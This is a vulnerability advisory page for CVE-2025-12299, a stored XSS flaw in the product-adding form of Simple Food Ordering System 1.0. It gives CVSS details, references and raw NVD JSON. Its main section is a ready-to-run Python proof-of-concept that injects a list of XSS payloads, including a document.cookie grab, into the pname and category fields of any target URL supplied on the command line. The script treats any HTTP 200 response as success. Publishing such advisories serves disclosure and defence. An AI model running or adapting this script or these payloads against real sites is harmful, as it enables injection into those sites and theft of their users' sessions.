CVE-2025-12299

Description

A security flaw has been discovered in code-projects Simple Food Ordering System 1.0. This vulnerability affects unknown code of the file /addproduct.php. The manipulation of the argument pname/category/price results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Simple Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12299 PoC - Simple Food Ordering System 1.0 XSS Vulnerability
Target: /addproduct.php
Parameters: pname, category, price
"""

import requests
import sys

def exploit_xss(target_url, payload):
    """
    Exploit stored XSS vulnerability in Simple Food Ordering System 1.0
    
    Args:
        target_url: Base URL of the vulnerable application
        payload: Malicious JavaScript payload to inject
    
    Returns:
        bool: True if exploitation successful, False otherwise
    """
    # Target endpoint for adding products
    add_product_url = f"{target_url}/addproduct.php"
    
    # Malicious payload for XSS injection
    # Using various XSS techniques to bypass basic filters
    xss_payloads = [
        payload,
        "<script>alert(String.fromCharCode(88,83,83))</script>",
        "<img src=x onerror=alert(document.cookie)>",
        "<svg/onload=alert(document.domain)>",
        "javascript:alert(String.fromCharCode(88,83,83))"
    ]
    
    for xss_payload in xss_payloads:
        # Data to be submitted - simulating product addition
        data = {
            'pname': xss_payload,      # Product name parameter
            'category': xss_payload,   # Category parameter
            'price': '99.99'           # Price parameter
        }
        
        try:
            # Send POST request with malicious payload
            response = requests.post(add_product_url, data=data, timeout=10)
            
            # Check if request was successful
            if response.status_code == 200:
                print(f"[+] Payload sent successfully: {xss_payload}")
                print(f"[+] Response status: {response.status_code}")
                return True
            else:
                print(f"[-] Request failed with status: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error sending request: {e}")
            continue
    
    return False

def verify_vulnerability(target_url):
    """
    Verify that the XSS vulnerability exists by checking if payload is reflected
    """
    # This would require checking the product listing page
    # to see if the injected script is executed
    print("[*] Manual verification required:")
    print(f"[*] 1. Visit {target_url}/addproduct.php")
    print("[*] 2. Submit a product with XSS payload in pname/category/price")
    print("[*] 3. Visit the product listing page to trigger the XSS")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-12299.py <target_url> [payload]")
        print("Example: python3 cve-2025-12299.py http://localhost/Simple-Food-Ordering-System")
        sys.exit(1)
    
    target = sys.argv[1]
    payload = sys.argv[2] if len(sys.argv) > 2 else "<script>alert('XSS')</script>"
    
    print(f"[*] Exploiting CVE-2025-12299 on {target}")
    print(f"[*] Using payload: {payload}")
    
    exploit_xss(target, payload)
    verify_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12299
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12299
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12299/
[4] VulDB https://vuldb.com/cve/CVE-2025-12299
[5] https://code-projects.org/
[6] https://github.com/underatted/CVE/issues/18
[7] https://vuldb.com/?ctiid.329971
[8] https://vuldb.com/?id.329971
[9] https://vuldb.com/?submit.676011

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12299", "sourceIdentifier": "[email protected]", "published": "2025-10-27T17:15:37.673", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Simple Food Ordering System 1.0. This vulnerability affects unknown code of the file /addproduct.php. The manipulation of the argument pname/category/price results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A79BB63C-FF08-4190-BC96-A24DC587AD07"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/underatted/CVE/issues/18", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329971", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329971", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676011", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}